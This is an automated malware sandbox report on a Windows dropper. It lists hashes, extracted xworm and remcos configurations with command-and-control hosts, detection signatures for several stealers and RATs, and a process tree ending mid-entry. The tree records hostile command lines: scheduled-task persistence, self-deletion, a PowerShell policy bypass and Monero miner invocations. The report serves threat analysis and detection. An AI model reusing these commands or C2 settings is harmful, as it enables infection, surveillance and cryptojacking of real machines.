Resubmissions

29-01-2024 12:19

240129-phancababl 10

12-01-2024 23:12

240112-268aqsfgap 10

Analysis

  • max time kernel
    214s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    29-01-2024 12:19

General

  • Target

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

C2

209.145.51.44:7000

Mutex

iLWUbOJf8Atlquud

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

remcos

Botnet

RemoteHost

C2

hendersonk1.hopto.org:2404

henderson1.camdvr.org:2404

centplus1.serveftp.com:2404

harrywlike.ddns.net:2404

genekol.nsupdate.info:2404

harrywlike1.ddns.net:2404

hendersonk2022.hopto.org:2404

genekol1.nsupdate.info:2404

generem.camdvr.org:2404

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    sonic.exe

  • copy_folder

    yakkk

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    chrome

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    gsgjdwg-1J0WWM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    fuckuuuuu

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • DcRat 8 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Xworm Payload 1 IoCs
  • Detect ZGRat V1 30 IoCs
  • Detected google phishing page
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 53 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 27 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2908
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1484
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:3296
      • C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
        "C:\Users\Admin\AppData\Local\Temp\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
        2⤵
        • DcRat
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3472
        • C:\Users\Admin\AppData\Local\Temp\Files\SvCpJuhbT.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\SvCpJuhbT.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3812
          • C:\Windows\SysWOW64\notepad.exe
            "C:\Windows\SysWOW64\notepad.exe"
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:504
            • C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
              "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
              5⤵
                PID:704
              • C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
                "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
                5⤵
                  PID:4796
            • C:\Users\Admin\AppData\Local\Temp\Files\lodir.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\lodir.exe"
              3⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:4596
            • C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1544
              • C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
                C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3572
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 536
                  5⤵
                  • Program crash
                  PID:1180
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3572 -s 528
                  5⤵
                  • Program crash
                  PID:3908
              • C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
                "C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5052
            • C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
              3⤵
              • Executes dropped EXE
              PID:4880
            • C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • Suspicious use of WriteProcessMemory
              • outlook_office_path
              • outlook_win_path
              PID:2676
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"
                4⤵
                  PID:4960
              • C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
                3⤵
                • Executes dropped EXE
                PID:4072
              • C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
                3⤵
                • Executes dropped EXE
                PID:2208
              • C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
                3⤵
                • Executes dropped EXE
                PID:4068
              • C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
                3⤵
                • Executes dropped EXE
                PID:3776
                • C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
                  "C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4932
              • C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:5080
                • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                  C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                  4⤵
                  • Executes dropped EXE
                  • Drops desktop.ini file(s)
                  • Drops file in Windows directory
                  • Suspicious use of SetWindowsHookEx
                  PID:2680
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                    5⤵
                      PID:2080
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        6⤵
                          PID:2492
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                          6⤵
                          • DcRat
                          • Creates scheduled task(s)
                          PID:4204
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c rd /s /q c:\$Recycle.bin
                        5⤵
                          PID:428
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c rd /s /q c:\recycler
                          5⤵
                            PID:2788
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c rd /s /q c:\$Recycle.bin
                            5⤵
                              PID:2072
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c rd /s /q c:\recycler
                              5⤵
                                PID:4588
                            • C:\Users\Admin\AppData\Local\Temp\nspB6E9.tmp
                              C:\Users\Admin\AppData\Local\Temp\nspB6E9.tmp
                              4⤵
                              • Executes dropped EXE
                              • Checks processor information in registry
                              PID:4028
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nspB6E9.tmp" & del "C:\ProgramData\*.dll"" & exit
                                5⤵
                                  PID:6744
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 5
                                    6⤵
                                    • Delays execution with timeout.exe
                                    PID:1292
                            • C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
                              "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:3124
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1396
                                4⤵
                                • Program crash
                                PID:2140
                            • C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
                              "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              PID:2940
                              • C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
                                4⤵
                                • Loads dropped DLL
                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                PID:3724
                                • C:\Windows\SysWOW64\help.exe
                                  "C:\Windows\SysWOW64\help.exe"
                                  5⤵
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: MapViewOfSection
                                  PID:648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /c del "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
                                    6⤵
                                      PID:5028
                              • C:\Users\Admin\AppData\Local\Temp\Files\user13.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\user13.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:1952
                                • C:\Windows\system32\cmd.exe
                                  "cmd" /C start /B C:\Users\Admin\AppData\Local\Temp\2417408603.bat
                                  4⤵
                                    PID:4488
                                • C:\Users\Admin\AppData\Local\Temp\Files\6.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4196
                                • C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4380
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd" /c net use
                                    4⤵
                                      PID:4808
                                      • C:\Windows\SysWOW64\net.exe
                                        net use
                                        5⤵
                                          PID:2304
                                    • C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:1752
                                    • C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:4304
                                    • C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:3464
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        4⤵
                                          PID:3748
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          4⤵
                                            PID:3328
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 564
                                              5⤵
                                              • Program crash
                                              PID:3488
                                        • C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2132
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
                                            4⤵
                                              PID:2736
                                          • C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4720
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                              4⤵
                                                PID:3776
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 256
                                                4⤵
                                                • Program crash
                                                PID:2236
                                            • C:\Users\Admin\AppData\Local\Temp\Files\z73.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\z73.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3308
                                              • C:\Users\Admin\AppData\Local\Temp\System\OmegaEngine.exe
                                                "C:\Users\Admin\AppData\Local\Temp\System\OmegaEngine.exe" -B --donate-level 1 -o xmr-eu1.nanopool.org:10343 -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero -o -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero
                                                4⤵
                                                • Executes dropped EXE
                                                PID:4628
                                            • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3224
                                            • C:\Users\Admin\AppData\Local\Temp\Files\dsdasda.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\dsdasda.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:3344
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                4⤵
                                                  PID:1576
                                              • C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:3744
                                              • C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: MapViewOfSection
                                                PID:2556
                                              • C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:3364
                                                • C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4788
                                              • C:\Users\Admin\AppData\Local\Temp\Files\build.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:796
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c cd C:\Users\Public\ && 7.exe x runing.7z && cd C:\Users\Public\runing && runing.exe -o 103.106.228.22:5335 --cpu --cpu-max-threads-hint 60 -B
                                                  4⤵
                                                    PID:3416
                                                • C:\Users\Admin\AppData\Local\Temp\Files\ko.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Files\ko.exe"
                                                  3⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:1952
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                                                    4⤵
                                                    • Enumerates system info in registry
                                                    PID:5868
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd007a9758,0x7ffd007a9768,0x7ffd007a9778
                                                      5⤵
                                                        PID:5156
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1816 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:8
                                                        5⤵
                                                          PID:6208
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:8
                                                          5⤵
                                                            PID:6200
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:2
                                                            5⤵
                                                              PID:6192
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:1
                                                              5⤵
                                                                PID:6820
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:1
                                                                5⤵
                                                                  PID:6808
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3580 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:1
                                                                  5⤵
                                                                    PID:7020
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3976 --field-trial-handle=2156,i,3471897057755248079,121416006728652594,131072 /prefetch:1
                                                                    5⤵
                                                                      PID:1952
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
                                                                    4⤵
                                                                    • Enumerates system info in registry
                                                                    PID:4152
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd007a9758,0x7ffd007a9768,0x7ffd007a9778
                                                                      5⤵
                                                                        PID:5168
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1844,i,11418051450366150641,3324156870583677999,131072 /prefetch:8
                                                                        5⤵
                                                                          PID:6608
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1844,i,11418051450366150641,3324156870583677999,131072 /prefetch:2
                                                                          5⤵
                                                                            PID:6600
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                                                                          4⤵
                                                                          • Enumerates system info in registry
                                                                          PID:4540
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd007a9758,0x7ffd007a9768,0x7ffd007a9778
                                                                            5⤵
                                                                              PID:5052
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1856,i,10020902443811372000,17934562889129690032,131072 /prefetch:8
                                                                              5⤵
                                                                                PID:6300
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
